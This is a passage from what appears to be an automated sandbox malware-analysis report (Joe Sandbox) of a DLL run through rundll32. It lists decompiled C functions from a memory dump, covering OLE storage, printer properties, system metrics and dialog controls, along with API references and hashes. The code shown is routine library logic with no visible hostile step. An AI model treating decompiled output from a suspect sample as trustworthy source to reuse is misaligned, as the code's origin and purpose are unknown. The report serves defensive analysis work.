										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
										__eflags = _t136;
										 *(_t224 - 0x10) = _t136;
										if(_t136 >= 0) {
											_t139 =  *(_t224 - 0x14);
											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
											_t141 =  *(_t224 - 0x18);
											 *((intOrPtr*)( *_t141 + 8))(_t141);
										}
										_t137 =  *(_t224 - 0x1c);
										L35:
										 *((intOrPtr*)( *_t137 + 8))(_t137);
										goto L37;
									}
									if(__eflags < 0) {
										L26:
										_t143 = GlobalAlloc(0, _t134);
										__eflags = _t143;
										 *(_t224 + 0x10) = _t143;
										if(_t143 == 0) {
											goto L29;
										}
										_t144 = GlobalLock(_t143);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L29;
										}
										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
										GlobalUnlock( *(_t224 + 0x10));
										goto L30;
									}
									__eflags = _t134 - 0xffffffff;
									if(_t134 >= 0xffffffff) {
										goto L29;
									}
									goto L26;
								}
								_t147 = _t224 + 0xc;
								 *(_t224 + 0xc) = 0;
								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
								__eflags = _t147;
								 *(_t224 - 0x10) = _t147;
								if(_t147 < 0) {
									goto L37;
								}
								_t148 = _t224 + 0x10;
								 *(_t224 + 0x10) = 0;
								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
								__eflags = _t148;
								 *(_t224 - 0x10) = _t148;
								if(_t148 >= 0) {
									_t149 =  *(_t224 - 0x14);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
									_t151 =  *(_t224 + 0x10);
									 *((intOrPtr*)( *_t151 + 8))(_t151);
								}
								_t137 =  *(_t224 + 0xc);
								goto L35;
							}
							L11:
							_t153 =  *_t219;
							_t213 = _t224 + 8;
							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x1003b2fc, _t224 + 8);
							__eflags = _t154;
							if(_t154 < 0) {
								goto L16;
							} else {
								__eflags = _t222;
								if(__eflags != 0) {
									E100131E9(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
									 *(_t224 - 4) = 0;
									E1001E462(_t224 - 0x2c, _t224 - 0x74);
									_t158 =  *(_t224 + 8);
									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
									_t47 = _t224 - 4;
									 *_t47 =  *(_t224 - 4) | 0xffffffff;
									__eflags =  *_t47;
									 *(_t224 - 0x10) = _t159;
									E100131AB(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
								} else {
									_t161 =  *(_t224 + 8);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
								}
								_t129 =  *(_t224 + 8);
								goto L38;
							}
						}
						if( *(_t224 + 0x10) != 0) {
							goto L16;
						}
						_t163 =  *_t219;
						_push(_t224 + 0x14);
						_push(0x1003b30c);
						_push(_t163);
						if( *((intOrPtr*)( *_t163))() < 0) {
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
							goto L11;
						} else {
							 *(_t224 + 0x10) = 0;
							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
							_t206 =  *((intOrPtr*)(_t224 + 0x14));
							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
							_t170 =  *((intOrPtr*)(_t224 + 0x14));
							 *((intOrPtr*)( *_t170 + 8))(_t170);
							 *((intOrPtr*)(_t224 + 0x14)) = 0;
							goto L39;
						}
					}
					_t172 =  *_t219;
					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
						goto L5;
					}
					_t174 =  *_t219;
					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
					 *(_t224 - 0x10) = _t175;
					if(_t175 < 0) {
						goto L44;
					}
					goto L5;
				}
				_t122 = E100149D9(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x1003b1ec, _t219,  *((intOrPtr*)(_t224 + 0x14)));
				 *(_t224 - 0x10) = _t122;
				if(_t122 < 0) {
					goto L52;
				}
				goto L2;
			}

APIs

__EH_prolog3.LIBCMT ref: 10016318

Part of subcall function 100149D9: SysStringLen.OLEAUT32(?), ref: 100149E1
Part of subcall function 100149D9: CoGetClassObject.OLE32(?,?,00000000,1003B22C,?), ref: 100149FF

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 100164A2
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 100164C3
GlobalAlloc.KERNEL32(00000000,00000000), ref: 10016510
GlobalLock.KERNEL32 ref: 1001651E
GlobalUnlock.KERNEL32(?), ref: 10016536
CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10016559
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10016575

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
String ID:
API String ID: 317715441-0
Opcode ID: 60c2ff367ba58e433878bfe60cdb3a31176345bcc59e7f0f273dcfb4529f5694
Instruction ID: 65bcce977c73c7d4b95501f4a81464407c87b4e582750ec1064cf11d2baf797c
Opcode Fuzzy Hash: 60c2ff367ba58e433878bfe60cdb3a31176345bcc59e7f0f273dcfb4529f5694
Instruction Fuzzy Hash: 20C108B090065ADFDB00DFA4CC889AEB7BAFF48344F504969F916EB251C771DA91CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10005BC3 Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E10005BC3(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E100110BD(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E100110BD( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

APIs

GlobalLock.KERNEL32 ref: 10005BE0
lstrcmpA.KERNEL32(?,?), ref: 10005BEC
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10005BFE
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10005C1E
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10005C26
GlobalLock.KERNEL32 ref: 10005C30
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10005C3D
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10005C55

Part of subcall function 100110BD: GlobalFlags.KERNEL32(?), ref: 100110C8
Part of subcall function 100110BD: GlobalUnlock.KERNEL32(?,?,00000000,10005C4F,?,00000000,?,?,00000000,00000000,00000002), ref: 100110DA
Part of subcall function 100110BD: GlobalFree.KERNEL32 ref: 100110E5

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: ebc32e4390c48c151e0b1777109bbc4563f4b747fd47ac077490b5256f26b009
Instruction ID: 834996e4caf1481c9af349bd82c863b941331106e3d5840b272905be7d33e105
Opcode Fuzzy Hash: ebc32e4390c48c151e0b1777109bbc4563f4b747fd47ac077490b5256f26b009
Instruction Fuzzy Hash: D3114875500A04BEEB129BA6CD89CAF7AEDEB89781B104519FA01D9122DA32E981D760

Uniqueness

Uniqueness Score: -1.00%

Function 10010DF8 Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010DF8(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x10048618 = GetSystemMetrics(2) + 1;
				 *0x1004861c = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x10010e03
0x10010e09
0x10010e10
0x10010e18
0x10010e22
0x10010e33
0x10010e3d
0x10010e45
0x10010e51

APIs

GetSystemMetrics.USER32 ref: 10010E05
GetSystemMetrics.USER32 ref: 10010E0C
GetSystemMetrics.USER32 ref: 10010E13
GetSystemMetrics.USER32 ref: 10010E1D
GetDC.USER32(00000000), ref: 10010E27
GetDeviceCaps.GDI32(00000000,00000058), ref: 10010E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10010E40
ReleaseDC.USER32 ref: 10010E48

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 802b906a014bb1a100fa31fb907cbbb50ae0ae566f16ced4c7029288865728b5
Instruction ID: e4bb4a9781883fca1ffd26e7a91d1cf17580d25377b1e53741b6ed809414a6cf
Opcode Fuzzy Hash: 802b906a014bb1a100fa31fb907cbbb50ae0ae566f16ced4c7029288865728b5
Instruction Fuzzy Hash: 8DF03671A40714AEF7206F718C8EF2B7BB4EB86B11F01891AE6418F1D1D6B599018F94

Uniqueness

Uniqueness Score: -1.00%

Function 1000E09F Relevance: 10.8, APIs: 7, Instructions: 255
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E1000E09F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t133;
				intOrPtr* _t140;
				int _t145;
				signed short _t148;
				short* _t149;
				intOrPtr _t152;
				signed short _t177;
				intOrPtr _t178;
				signed int _t179;
				intOrPtr _t184;
				struct tagRECT _t189;
				int _t190;
				void* _t191;
				signed short _t193;
				signed short _t194;
				void* _t195;
				void* _t221;
				intOrPtr _t225;
				short _t226;
				intOrPtr* _t233;
				void* _t234;
				signed short* _t236;
				signed int _t240;
				void* _t241;
				signed short* _t242;
				signed short* _t244;
				signed short* _t245;
				signed int _t246;
				void* _t248;

				_t246 = _t248 - 0x44;
				_t133 =  *0x10045580; // 0x2ef01728
				 *(_t246 + 0x48) = _t133 ^ _t246;
				_push(0x50);
				E1001FBC4(E100338B7, __ebx, __edi, __esi);
				_t233 =  *((intOrPtr*)(_t246 + 0x60));
				_t236 =  *(_t246 + 0x68);
				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
				 *(_t246 + 8) =  *(_t246 + 0x58);
				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
				_t140 = _t233 + 0x12;
				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
					 *((short*)(_t246 - 0x12)) =  *_t140;
					_t225 = _t233 + 0x18;
					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
					_t233 = _t246 - 0x20;
					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
				}
				_t226 =  *((short*)(_t233 + 0xa));
				_t189 =  *((short*)(_t233 + 8));
				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
				 *(_t246 - 0x30) = _t189;
				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
					_t194 =  *_t236;
					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
					_t236 =  &(_t236[2]);
					if(_t194 > 0) {
						__imp__#4(_t236, _t194);
						_t195 = _t194 + _t194;
						_t236 = _t236 + _t195;
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
						 *(_t246 + 0x24) = _t145;
					}
				}
				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
				E1000424F(_t246 + 0x28, E1001044F());
				 *((intOrPtr*)(_t246 - 4)) = 0;
				 *(_t246 + 0xc) = 0;
				 *(_t246 + 0x10) = 0;
				 *(_t246 + 0x18) = 0;
				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
					_t148 =  *_t236;
					_t57 = _t148 - 0xc; // -12
					_t226 = _t57;
					_t236 =  &(_t236[6]);
					 *_t246 = _t148;
					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
					if(_t226 <= 0) {
						L16:
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t177 =  *_t236;
						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
						_t242 =  &(_t236[2]);
						_t193 =  *_t242 & 0x0000ffff;
						_t236 =  &(_t242[1]);
						 *(_t246 + 4) = _t177;
						if(_t177 != 0x80010001) {
							_t178 = E10004D4A(__eflags, 0x1c);
							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
							__eflags = _t178;
							 *((char*)(_t246 - 4)) = 1;
							if(_t178 == 0) {
								_t179 = 0;
								__eflags = 0;
							} else {
								_t179 = E1001587F(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
							}
							 *((char*)(_t246 - 4)) = 0;
							 *(_t246 + 0x20) = _t179;
						} else {
							_t244 =  &(_t236[2]);
							 *(_t246 + 0x10) =  *_t236;
							_t245 =  &(_t244[6]);
							 *(_t246 + 0x18) =  *_t244;
							E100054DB(_t246 + 0x28, _t245);
							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
							_t221 = 0xffffffef;
							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
							_t236 = _t245 + _t184 + 1;
							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
					_t148 =  *_t246;
					goto L16;
				} else {
					L17:
					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
					_t263 =  *_t149 - 0x7b;
					_push(_t246 + 0x38);
					_push(_t149);
					if( *_t149 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t190 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t246 + 0x6c)));
					_push(_t236);
					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
					E1001B444(0, _t246 - 0x5c, _t233, _t236, _t263);
					 *((char*)(_t246 - 4)) = 2;
					 *((intOrPtr*)(_t246 + 0x34)) = 0;
					asm("sbb esi, esi");
					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
						_push(1);
						if(E10013723(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E10013CC0( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
							E10014EA9( *((intOrPtr*)(_t246 + 0x34)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
							E1000DFFE(0,  *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246 + 0x28);
							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
						}
					}
					if( *(_t246 + 0x24) != _t190) {
						__imp__#6( *(_t246 + 0x24));
					}
					_t152 =  *((intOrPtr*)(_t246 + 0x34));
					if(_t152 == _t190) {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
						_t190 = 1;
					}
					 *((char*)(_t246 - 4)) = 0;
					E1001B7A6(_t190, _t246 - 0x5c, _t226, _t233, _t240, 1);
					E10001260( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
					_pop(_t234);
					_pop(_t241);
					_pop(_t191);
					return E1001FBB5(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 1000E0B8
MapDialogRect.USER32(?,00000000), ref: 1000E149
SysAllocStringLen.OLEAUT32(?,?), ref: 1000E168
CLSIDFromString.OLE32(?,?,00000000), ref: 1000E25A

Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64

CLSIDFromProgID.OLE32(?,?,00000000), ref: 1000E262
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,00000000,00000000,0000FC84,00000000), ref: 1000E2FC
SysFreeString.OLEAUT32(00000000), ref: 1000E34E

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
String ID:
API String ID: 2841959276-0
Opcode ID: 9d34684e24badfdf3165c200de488e3f2ad464638950e21b7713cad24ab37ac0
Instruction ID: a3f1bd5bd1abf24c4919bb55c1ab413f5f44746dc04b4daccf7064a6dc2a22e9
Opcode Fuzzy Hash: 9d34684e24badfdf3165c200de488e3f2ad464638950e21b7713cad24ab37ac0
Instruction Fuzzy Hash: EFB1F3B5900259AFEB04DFA8C984AED7BF4FF08344F05812AFC19A7251E774E994CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1001A49E Relevance: 10.6, APIs: 7, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E1001A49E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr* _t93;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t103;
				intOrPtr _t120;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = __edx;
				_push(0x6c);
				E1001FBC4(E100346AE, __ebx, __edi, __esi);
				_t122 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t123 - 0x14) = 0;
				 *(_t123 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L18:
					 *(_t122 + 0x44) =  *(_t122 + 0x44) & 0x00000000;
					return E1001FC9C(0);
				} else {
					goto L1;
				}
				do {
					L1:
					_t108 =  *(_t123 - 0x10) * 0x28;
					_t76 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x14)) + 0x24 +  *(_t123 - 0x10) * 0x28));
					if(_t76 == 0) {
						goto L17;
					}
					_t78 =  *((intOrPtr*)(_t76 + 4));
					 *((intOrPtr*)(_t123 - 0x20)) = _t78;
					if(_t78 == 0) {
						goto L17;
					}
					 *(_t123 - 0x18) =  *(_t123 - 0x14) << 4;
					do {
						_t120 =  *((intOrPtr*)(E1000911A(_t123 - 0x20)));
						 *((intOrPtr*)(_t123 - 0x24)) = 0xfffffffd;
						E10020F40(_t120, _t123 - 0x78, 0, 0x20);
						_t124 = _t124 + 0xc;
						E1001BDF4(_t123 - 0x48);
						 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
						_t130 =  *((intOrPtr*)(_t122 + 0x48));
						if( *((intOrPtr*)(_t122 + 0x48)) == 0) {
							_t89 =  *((intOrPtr*)(_t122 + 0x40)) +  *(_t123 - 0x18);
							__eflags = _t89;
						} else {
							_t103 = E10019F87(_t108, _t122, _t116, _t120, _t122, _t130);
							 *(_t123 - 4) = 1;
							E1001BDD4(_t103, _t123 - 0x48, _t103);
							 *(_t123 - 4) = 0;
							__imp__#9(_t123 - 0x58, _t123 - 0x58,  *(_t123 - 0x10) + 1);
							_t89 = _t123 - 0x48;
						}
						 *((intOrPtr*)(_t123 - 0x38)) = _t89;
						 *((intOrPtr*)(_t123 - 0x34)) = _t123 - 0x24;
						 *((intOrPtr*)(_t123 - 0x30)) = 1;
						 *((intOrPtr*)(_t123 - 0x2c)) = 1;
						 *(_t120 + 0x88) = 1;
						_t93 =  *((intOrPtr*)(_t120 + 0x50));
						if(_t93 != 0) {
							_t116 = _t123 - 0x1c;
							_push(_t123 - 0x1c);
							_push(0x1003b21c);
							_push(_t93);
							if( *((intOrPtr*)( *_t93))() >= 0) {
								_t96 =  *((intOrPtr*)(_t123 - 0x1c));
								_t116 = _t123 - 0x38;
								 *((intOrPtr*)( *_t96 + 0x18))(_t96,  *((intOrPtr*)(_t120 + 0x9c)), 0x1003b19c, 0, 4, _t123 - 0x38, 0, _t123 - 0x78, _t123 - 0x28);
								_t98 =  *((intOrPtr*)(_t123 - 0x1c));
								 *((intOrPtr*)( *_t98 + 8))(_t98);
								 *(_t120 + 0x88) =  *(_t120 + 0x88) & 0x00000000;
								if( *((intOrPtr*)(_t123 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x74)));
								}
								if( *((intOrPtr*)(_t123 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x70)));
								}
								if( *((intOrPtr*)(_t123 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x6c)));
								}
								 *(_t123 - 0x14) =  *(_t123 - 0x14) + 1;
								 *(_t123 - 0x18) =  *(_t123 - 0x18) + 0x10;
							}
						}
						 *(_t123 - 4) =  *(_t123 - 4) | 0xffffffff;
						__imp__#9(_t123 - 0x48);
					} while ( *((intOrPtr*)(_t123 - 0x20)) != 0);
					L17:
					 *(_t123 - 0x10) =  *(_t123 - 0x10) + 1;
				} while ( *(_t123 - 0x10) <  *((intOrPtr*)(_t122 + 0x10)));
				goto L18;
			}

APIs

__EH_prolog3.LIBCMT ref: 1001A4A5
_memset.LIBCMT ref: 1001A511

Part of subcall function 1001BDF4: _memset.LIBCMT ref: 1001BDFC

VariantClear.OLEAUT32(?), ref: 1001A551
SysFreeString.OLEAUT32(00000000), ref: 1001A5D2
SysFreeString.OLEAUT32(00000000), ref: 1001A5E1
SysFreeString.OLEAUT32(00000000), ref: 1001A5F0
VariantClear.OLEAUT32(00000000), ref: 1001A605

Part of subcall function 10019F87: __EH_prolog3.LIBCMT ref: 10019FA3
Part of subcall function 10019F87: VariantClear.OLEAUT32(?), ref: 1001A008

Part of subcall function 1001BDD4: VariantCopy.OLEAUT32(?,?), ref: 1001BDE2

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
